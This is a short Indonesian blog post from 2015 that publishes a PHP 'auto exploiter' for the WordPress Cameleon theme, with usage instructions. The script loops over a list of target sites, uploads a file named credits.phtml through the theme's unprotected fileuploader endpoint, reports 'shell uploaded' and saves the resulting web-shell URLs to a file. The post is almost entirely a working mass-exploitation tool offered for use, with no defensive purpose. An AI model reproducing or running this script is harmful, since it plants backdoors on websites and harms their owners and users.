Halaman

WordPress Chameleon Auto exploiter

Senin, 07 Desember 2015



#- Title : WordPress Chameleon Auto exploiter
#- Coded By : kkk1337
#- Team : Umbrella Security
#- Extension : Php
#- Using this Tool >> php file.php list.txt
#- Example >> file.php = This file name | list.txt = your list target


<?php 


// Coded by KkK1337

// Greetz to: Condor8

// fb: https://www.facebook.com/Cracker1337

// pastebin: http://pastebin.com/u/KkK1337

// don't change rights


echo "chameleon auto-exploiter by KkK1337";


$x=file($argv[1]);

foreach ($x as $sites){
$sites=trim($sites);
$uploadfile="credits.phtml";
$ch = curl_init("$sites/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$waw = curl_exec($ch);
curl_close($ch);

if(preg_match("/success/i",$waw)){

print "shell uploaded : $sites \n";
$u="$sites/wp-content/uploads/2014/10/credits.phtml"; // Change year and month. Year: 2014 , Month: 10
$ux = "".$u."\r\n"; $save=fopen('new.txt','ab'); fwrite($save,"$ux");

}

else{

echo "Not vuln : $sites\n";

}

}


?>

Tidak ada komentar:

Posting Komentar